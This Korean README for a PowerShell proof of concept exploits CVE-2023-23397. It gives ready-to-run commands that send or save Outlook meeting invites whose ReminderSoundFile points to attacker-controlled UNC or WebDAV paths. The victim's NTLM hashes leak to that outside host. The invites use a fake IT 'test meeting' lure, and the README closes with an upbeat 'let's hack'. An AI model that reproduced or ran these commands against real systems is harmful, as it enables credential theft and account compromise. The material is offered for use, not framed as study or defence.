
PowerShell 개념 증명: CVE-2023-23397을 위한, UNC 경로 주입을 통해 Outlook 일정 알림을 악용하여 NTLM 해시를 유출시켜 자격 증명을 탈취합니다.
ReminderSoundFile 옵션을 사용하여 캘린더 NTLM 누출을 보내거나 저장하는 스크립트 함수들입니다. 스크립트를 실행하여 Powershell에 함수를 로드한 후, 아래 예제를 함수 사용의 시작점으로 활용할 수 있습니다. Outlook COM 개체를 사용하여 이메일을 보내므로 Outlook이 설치된 Windows 머신에서 실행해야 합니다. 현재 함수는 스크립트 실행 시점을 기준으로 회의 시작 시간을 추가하고 지속 시간을 2시간으로 설정합니다. 또한 Outlook에 연결된 이메일 계정으로 이메일을 보냅니다.
전송:
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
저장:
Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
해킹하자!